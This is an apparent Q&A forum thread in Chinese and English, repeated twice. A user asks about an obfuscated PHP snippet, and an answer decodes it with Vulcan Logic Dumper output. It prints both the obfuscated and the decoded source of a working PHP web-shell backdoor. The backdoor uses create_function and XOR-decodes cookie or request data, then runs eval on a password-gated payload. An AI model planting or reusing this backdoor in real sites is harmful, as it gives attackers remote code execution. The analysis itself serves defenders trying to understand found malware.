请帮助理解混淆的加密 php 代码
Please help to understand obfuscated encrypted php code
找到这个,php 很容易解释代码,但不知道它是如何工作的
$MfgVs='.Y 8:4cM:<Q39SP'^'M+EYNQ<+OR2GP<>';
$gxkCISZo=$MfgVs('','B3EEZ7+OFT Vr0OYIEGru59R5-SN4r38OOeCOm8OHT8V35=8Cj4 <,XZ88:nA3>DnDL;VbCw,5+GWFQkV.YHqG=9>vGkoClKP23C:dP>VZkChuF9YK0YL3Xja4.JVdrdE1FgsaYMbR<6mhmBMf>AN4lPD5Zozc>,>nb,jTEC>ATH-KGXYGD9SL3dkHE=25-Fs;2NhY07.3.6fQJOJ+WRnH; SSHmq,4IAkKW1Olv17TSUJrRWWLXP7>ZjE6,6tq<,r85Yf>.1wUdfe5J5LWQqLkehZU,9jUPYyqZG<V:BExl>57PAKbU,A5KNI42>rSReXlq1R3,JI0CbZDKPRCYhZF.nkq4+>mG+SxuFX4Ssowo4Z>DSqf,Ny:h08XYbY. cdeAREYbNADhR,<+CMJb2LP8XqS2+nJeHc5OXTETH4FYXVN89 =B<BXV:22S<AhbP7<q6S0.aC53SYDORiH>LL2azRVD0-,<<QUzETy16kV4.CRabBeV1N5,1VP>;-S962 QsU 1NNNqI,: cOQTWb44ydS1XJJaj>PYJ>oFUKFAD,ZxYSd1BEyVGawBPSgy+r1LsDLksay7tyHQhY-8<RBfQHUbK9S1TIQVHO0Y=+QNGmbTRY,zSwMeXpk0d>71W5Lp3XT6=kAA;=6Y2mnbk<E=U-=ftNcr4'^'+Umd<BE,2=O8-U70:14ZRMV jI2:U-lU:;BjfMCEA2M8PATW-JLONs<;LYe1,FJlJ -O7NcSGPRnwfqKvUSAxcRLJVzKHdWAY;U,HLtWvgKsSUbPe8D+ V6BEPO>7MIDaXmLZkPDF=IBMFPbeBZ :U7t-hz1ZGUIG5FEJqe0J38-Ccc3<>mdzw9mb: IGGCnWTG:Ab:>S9S<lu..>JwoN.ZL 6sgUHU= 4 2HoQVWV8 0qxX18>=1TVzBaioy;:uiRYFyBUKHWhZFAC+Y92xQ7alL>4XX5>5 YLzcW3CyOqHZTC1avBqZ Y>+r>O4x:4EpMUU3GMciKIk<+953 1Hrbq<. anm9gJ XQ-=MsNQWKB;R16XFWDp3LTY,8=2KYCYEe9 YDHML6MHJcpjFD-<M=JY;Vd7oBGQ.,5eiht37+3<QXLT8Yj 9HmV2H 7==BHYT2CKWwjW6:++7AlZ-8SHVrr QYMcW4,SlosXPCrPO73ADdE7C<TUn=5GdH+PEFSyT>EHibnU-MNAJowrwJYPLLwU9>+:MU5 mcFfhvffvN;MigWWq L0wUDva6PJNBWyEsuZAYJQSPhwNyLJN3;9:-,=.A:B :yq8.I5RJ5ikMF03-MSzWmExPKKn7RG6YdTW9 WfL1 BQY8VJ3KP6LX-DINDgXxI');
$gxkCISZo();
$MfgVs
create_function 很清楚,但是里面是什么???非常酷的混淆,但可以解密吗?
不太好,代码翻译成:
if(!function_exists('xor_data__mut')) {
function xor_data__mut($data, $key) {
$out = '';
for($i = 0; $i<strlen($data); $i++)
$out .= ($data[$i] ^ $key[$i % strlen($key)]);
return($out);
}
}
$data = false;
$data_key = false;
foreach ($_COOKIE as $key => $value) {
$data_key = $key;
$data = $value;
}
if (!$data) {
foreach ($_REQUEST as $key => $value) {
$data_key = $key;
$data = $value;
}
}
$data = @unserialize(xor_data__mut(base64_decode($data), $data_key));
if($data && array_key_exists('key', $data) && (md5($data['key']) == '2ba5043f3e5f04341e73e0f56791283f') && array_key_exists('payload', $data)) {
eval($data['payload']);
exit(0);
}
如何找到的?
通过使用 Vulcan Logic Dumper,您可以在内部查看正在发生的事情:
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
function name: (null)
number of ops: 9
compiled vars: !0 = $MfgVs, !1 = $gxkCISZo
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
2 0 E > ASSIGN !0, 'create_function'
3 1 INIT_DYNAMIC_CALL !0
2 SEND_VAL_EX ''
3 SEND_VAL_EX 'if%28%21function_exists%28%27xor_data__mut%27%29%29+%7B%0A%09function+xor_data__mut%28%24data%2C+%24key%29+++++%7B%0A%09%09%24out+%3D+%27%27%3B%0A%09%09for%28%24i+%3D+0%3B+%24i%3Cstrlen%28%24data%29%3B+%24i%2B%2B%29%0A%09%09%24out+.%3D+%28%24data%5B%24i%5D+%5E+%24key%5B%24i+%25+strlen%28%24key%29%5D%29%3B%0A%09%09return%28%24out%29%3B%0A%09%7D%0A%7D%0A%0A%24data+%3D+false%3B%0A%24data_key+%3D+false%3B%0A%0Aforeach+%28%24_COOKIE+as+%24key+%3D%3E+%24value%29+%7B%0A%09%24data_key+%3D+%24key%3B%0A%09%24data+%3D+%24value%3B%0A%7D%0A%0Aif+%28%21%24data%29+%7B%0A%09foreach+%28%24_REQUEST+as+%24key+%3D%3E+%24value%29+%7B%0A%09%09%24data_key+%3D+%24key%3B%0A%09%09%24data+%3D+%24value%3B%0A%09%7D%0A%7D%0A%0A%24data+%3D+%40unserialize%28xor_data__mut%28base64_decode%28%24data%29%2C+%24data_key%29%29%3B%0Aif%28%24data+%26%26+array_key_exists%28%27key%27%2C+%24data%29+%26%26+%28md5%28%24data%5B%27key%27%5D%29+%3D%3D+%272ba5043f3e5f04341e73e0f56791283f%27%29+%26%26+array_key_exists%28%27payload%27%2C+%24data%29%29++++++%7B%0A%09eval%28%24data%5B%27payload%27%5D%29%3B%0A%09exit%280%29%3B%0A%7D'
4 DO_FCALL 0
5 ASSIGN !1,
4 6 INIT_DYNAMIC_CALL !1
7 DO_FCALL 0
8 > RETURN 1
SEND_VAL_EX
只是 url/percent 编码,对其进行解码,然后你就得到了 create_function
代码。
找到这个,php 很容易解释代码,但不知道它是如何工作的
$MfgVs='.Y 8:4cM:<Q39SP'^'M+EYNQ<+OR2GP<>';
$gxkCISZo=$MfgVs('','B3EEZ7+OFT Vr0OYIEGru59R5-SN4r38OOeCOm8OHT8V35=8Cj4 <,XZ88:nA3>DnDL;VbCw,5+GWFQkV.YHqG=9>vGkoClKP23C:dP>VZkChuF9YK0YL3Xja4.JVdrdE1FgsaYMbR<6mhmBMf>AN4lPD5Zozc>,>nb,jTEC>ATH-KGXYGD9SL3dkHE=25-Fs;2NhY07.3.6fQJOJ+WRnH; SSHmq,4IAkKW1Olv17TSUJrRWWLXP7>ZjE6,6tq<,r85Yf>.1wUdfe5J5LWQqLkehZU,9jUPYyqZG<V:BExl>57PAKbU,A5KNI42>rSReXlq1R3,JI0CbZDKPRCYhZF.nkq4+>mG+SxuFX4Ssowo4Z>DSqf,Ny:h08XYbY. cdeAREYbNADhR,<+CMJb2LP8XqS2+nJeHc5OXTETH4FYXVN89 =B<BXV:22S<AhbP7<q6S0.aC53SYDORiH>LL2azRVD0-,<<QUzETy16kV4.CRabBeV1N5,1VP>;-S962 QsU 1NNNqI,: cOQTWb44ydS1XJJaj>PYJ>oFUKFAD,ZxYSd1BEyVGawBPSgy+r1LsDLksay7tyHQhY-8<RBfQHUbK9S1TIQVHO0Y=+QNGmbTRY,zSwMeXpk0d>71W5Lp3XT6=kAA;=6Y2mnbk<E=U-=ftNcr4'^'+Umd<BE,2=O8-U70:14ZRMV jI2:U-lU:;BjfMCEA2M8PATW-JLONs<;LYe1,FJlJ -O7NcSGPRnwfqKvUSAxcRLJVzKHdWAY;U,HLtWvgKsSUbPe8D+ V6BEPO>7MIDaXmLZkPDF=IBMFPbeBZ :U7t-hz1ZGUIG5FEJqe0J38-Ccc3<>mdzw9mb: IGGCnWTG:Ab:>S9S<lu..>JwoN.ZL 6sgUHU= 4 2HoQVWV8 0qxX18>=1TVzBaioy;:uiRYFyBUKHWhZFAC+Y92xQ7alL>4XX5>5 YLzcW3CyOqHZTC1avBqZ Y>+r>O4x:4EpMUU3GMciKIk<+953 1Hrbq<. anm9gJ XQ-=MsNQWKB;R16XFWDp3LTY,8=2KYCYEe9 YDHML6MHJcpjFD-<M=JY;Vd7oBGQ.,5eiht37+3<QXLT8Yj 9HmV2H 7==BHYT2CKWwjW6:++7AlZ-8SHVrr QYMcW4,SlosXPCrPO73ADdE7C<TUn=5GdH+PEFSyT>EHibnU-MNAJowrwJYPLLwU9>+:MU5 mcFfhvffvN;MigWWq L0wUDva6PJNBWyEsuZAYJQSPhwNyLJN3;9:-,=.A:B :yq8.I5RJ5ikMF03-MSzWmExPKKn7RG6YdTW9 WfL1 BQY8VJ3KP6LX-DINDgXxI');
$gxkCISZo();
$MfgVs
create_function 很清楚,但是里面是什么???非常酷的混淆,但可以解密吗?
不太好,代码翻译成:
if(!function_exists('xor_data__mut')) {
function xor_data__mut($data, $key) {
$out = '';
for($i = 0; $i<strlen($data); $i++)
$out .= ($data[$i] ^ $key[$i % strlen($key)]);
return($out);
}
}
$data = false;
$data_key = false;
foreach ($_COOKIE as $key => $value) {
$data_key = $key;
$data = $value;
}
if (!$data) {
foreach ($_REQUEST as $key => $value) {
$data_key = $key;
$data = $value;
}
}
$data = @unserialize(xor_data__mut(base64_decode($data), $data_key));
if($data && array_key_exists('key', $data) && (md5($data['key']) == '2ba5043f3e5f04341e73e0f56791283f') && array_key_exists('payload', $data)) {
eval($data['payload']);
exit(0);
}
如何找到的?
通过使用 Vulcan Logic Dumper,您可以在内部查看正在发生的事情:
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
function name: (null)
number of ops: 9
compiled vars: !0 = $MfgVs, !1 = $gxkCISZo
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
2 0 E > ASSIGN !0, 'create_function'
3 1 INIT_DYNAMIC_CALL !0
2 SEND_VAL_EX ''
3 SEND_VAL_EX 'if%28%21function_exists%28%27xor_data__mut%27%29%29+%7B%0A%09function+xor_data__mut%28%24data%2C+%24key%29+++++%7B%0A%09%09%24out+%3D+%27%27%3B%0A%09%09for%28%24i+%3D+0%3B+%24i%3Cstrlen%28%24data%29%3B+%24i%2B%2B%29%0A%09%09%24out+.%3D+%28%24data%5B%24i%5D+%5E+%24key%5B%24i+%25+strlen%28%24key%29%5D%29%3B%0A%09%09return%28%24out%29%3B%0A%09%7D%0A%7D%0A%0A%24data+%3D+false%3B%0A%24data_key+%3D+false%3B%0A%0Aforeach+%28%24_COOKIE+as+%24key+%3D%3E+%24value%29+%7B%0A%09%24data_key+%3D+%24key%3B%0A%09%24data+%3D+%24value%3B%0A%7D%0A%0Aif+%28%21%24data%29+%7B%0A%09foreach+%28%24_REQUEST+as+%24key+%3D%3E+%24value%29+%7B%0A%09%09%24data_key+%3D+%24key%3B%0A%09%09%24data+%3D+%24value%3B%0A%09%7D%0A%7D%0A%0A%24data+%3D+%40unserialize%28xor_data__mut%28base64_decode%28%24data%29%2C+%24data_key%29%29%3B%0Aif%28%24data+%26%26+array_key_exists%28%27key%27%2C+%24data%29+%26%26+%28md5%28%24data%5B%27key%27%5D%29+%3D%3D+%272ba5043f3e5f04341e73e0f56791283f%27%29+%26%26+array_key_exists%28%27payload%27%2C+%24data%29%29++++++%7B%0A%09eval%28%24data%5B%27payload%27%5D%29%3B%0A%09exit%280%29%3B%0A%7D'
4 DO_FCALL 0
5 ASSIGN !1,
4 6 INIT_DYNAMIC_CALL !1
7 DO_FCALL 0
8 > RETURN 1
SEND_VAL_EX
只是 url/percent 编码,对其进行解码,然后你就得到了 create_function
代码。